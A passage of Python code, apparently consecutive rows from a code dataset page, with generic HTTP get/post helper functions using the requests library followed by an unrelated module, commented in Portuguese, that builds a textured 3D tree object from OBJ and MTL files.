        headers: Optional dict of request headers.
        queryparams: Optional dict of query-string parameters.

    Returns:
        The response body parsed as JSON (raises ValueError if not JSON).
    """
    result = requests.get(url, headers=headers, params=queryparams)
    return result.json()
def post(url, headers=None, data=None):
    """Issue an HTTP POST with *data* serialized as a JSON body.

    Fix: the mutable-default `headers={}` is replaced with None (requests
    treats None the same as an empty dict).

    NOTE(review): no Content-Type header is set, and unlike get() this returns
    the raw Response rather than the decoded JSON — both kept as-is for
    backward compatibility with existing callers.

    Args:
        url: Target URL.
        headers: Optional dict of request headers.
        data: JSON-serializable payload; None is sent as the literal body "null".

    Returns:
        The raw requests.Response object.
    """
    result = requests.post(url, headers=headers, data=json.dumps(data))
    return result
from Base import *
from Object import *
'''
Esta funcao cria um objeto do tipo Arvore e o retorna
@PARAMETROS
id_tex_livre - primeiro id de textura nao utilizado - passado como lista de tamanho 1
vertices_list - lista de coordenadas de vertices
textures_coord_list - lista de coordenadas de textura
normals_list - lista de normais de vertices
@RETORNO
object - o objeto Arvore criado
'''
def cria_arvore(id_tex_livre, vertices_list, textures_coord_list, normals_list):
    """Create and return the tree ("Arvore") scene object.

    Args:
        id_tex_livre: First unused texture id, passed as a single-element list.
        vertices_list: Shared list of vertex coordinates (appended to).
        textures_coord_list: Shared list of texture coordinates (appended to).
        normals_list: Shared list of vertex normals (appended to).

    Returns:
        The constructed Object instance for the tree.
    """
    # Texture image files used by the tree model.
    tree_textures = ["Arvore/bark_0021.jpg", "Arvore/DB2X2_L01.png"]
    obj_path = "Arvore/arvore.obj"
    mtl_path = "Arvore/arvore.mtl"
    # NOTE(review): the numeric arguments are presumably position (8, 0, -8),
    # rotation (0, 0, 0) and scale 3 — confirm against Object's signature.
    return Object(obj_path, mtl_path, tree_textures,
                  8, 0, -8, 0, 0, 0, 3,
                  id_tex_livre, vertices_list, textures_coord_list, normals_list)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.